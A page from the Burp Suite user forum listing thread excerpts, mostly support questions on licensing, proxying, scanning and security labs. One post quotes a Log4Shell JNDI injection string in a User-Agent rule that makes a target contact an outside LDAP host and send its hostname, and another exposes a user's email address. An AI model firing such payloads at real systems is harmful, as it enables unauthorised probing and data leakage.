How do I? - Page 115 - Burp Suite User Forum

Get certificate from unlicensed burp jar

Hi, Recently I renewed my license for Burp Professional, with the new license, the Burp certificate changed. A lot of my clients added the old certificate into the android application for testing purposes so I don’t have...

Also unable to intercept Terminal http requests

Hello, I've seen some posts on the forum about intercepting terminal traffic. I am also using macOS and unable to do it. Help please.

BURP Scan login to portal

I have a license Professional BURP Suite. I want to scan a website consider xyz.com the home page of xyz.com is nothing but a Log In page with label button as "GET STARTED" I have mentioned this in "Application Login"...

Burp Suite Pro, on 1920 x1080 with 150% scale displaying blurry

I recently purchased a yoga 6 with Windows 11 built-in and trying to run Burp suite pro, but the default scale display of the laptop is 150% and burp displays blurry. If i change the scale to 100% is displays okay however...

No more activations allowed for this license

Dear Team, I'm facing No more activations allowed for this license, kindly check and do the needful. Find the below information may be required for you. License Email: prasannakumar.v@nelito.com Currently Licensed not...

2FA Broken logic lab issue

Know i see the video which is come with 2FA broken logic lab and i do what exaclty the instructor do but the 10000 requests to hack the msf-code not any of them are 302 , it's all 200 response code when i set verfiy value in...

Cannot download Burp Community Edition

I've tried multiple versions (https://portswigger.net/burp/releases), and even though the button turns gray, the file never downloads. All extensions disabled and no security software.

Burp Suite Response Render Issue - Embedded Browser Initialization Failed

Hi Team, I am running as root user on Kali and getting this error when viewing response render: Embedded Browser Initialization Failed It is mentioned in Burp Forum to perform the following steps to fix that issue:...

How do I import sitemap from export sitemap file?

The feature "Save selected items"[1] let user export every request and response paths that Burp know about a specific domain. How do I import the exported file back to Sitemap? [1]. Target > Sitemap > right-click on a...

REST API - OAuth 2.0

How do I capture the OAuth 2.0 information when performing the REST API security testing in Enterprise edition.

Delete my account

Hi, i want to delete my account.

SQL injection

How to identify bugs

Transfer User Licenses

Dear Support team, we bought 2 licenses of Burp Suite Professional with the help of CCP Software GmbH. The keys are now connected to an account of a collegue who is no longer working for us. How can we connect the...

my license has been used many times now is not working

Hello Support team happy new year i need to disable the old license and generate a new one in order to disable the old devices over the cloud thanks

burp collab client - Wont work properly

Hi there, I need help enabling burp collab client to work correctly. I do the health check and am not sure how to fix the problems that arise and i dont see full solutions online.

Bad Request in Web Academy labs..!!!!

Hi all, I'm totally new to web security want to learn web security and I've found out portswigger web labs. this is my first day starting to learn about websec. but, when I tried to access my first lab as suggested by...

How do I know if https requests are failing to be decrypted?

I am attempting to mitm an android emulator on my computer with burpsuite. I am able to see https traffic of insecure things like assets, but I see no traffic for data being posted to and from the app, over https. I know the...

Scanner does not honor match/replace rules

I have added a log4j match/replace rule on the User-Agent like this Match: ^User-Agent.*$ Replace: User-Agent: \${jndi:ldap://log4shell.huntress.com:1389/hostname=\${env:HOSTNAME}/guid} The rule works just fine when...

LAB: Exploiting HTTP request smuggling to perform web cache poisoning

Hello everyone! Im having troubles with this lab. I tried even to follow the youtube videos to get with the solution and not even that helps. Im getting a 400 and {"error":"Invalid request"} I tried also to switch...

Digest Auth in Burp was removed?

Hi, What happened with Digest authentication support? https://portswigger.net/burp/documentation/desktop/options/connections "Supported authentication types are: basic, NTLMv1, and NTLMv2" In the previous versions...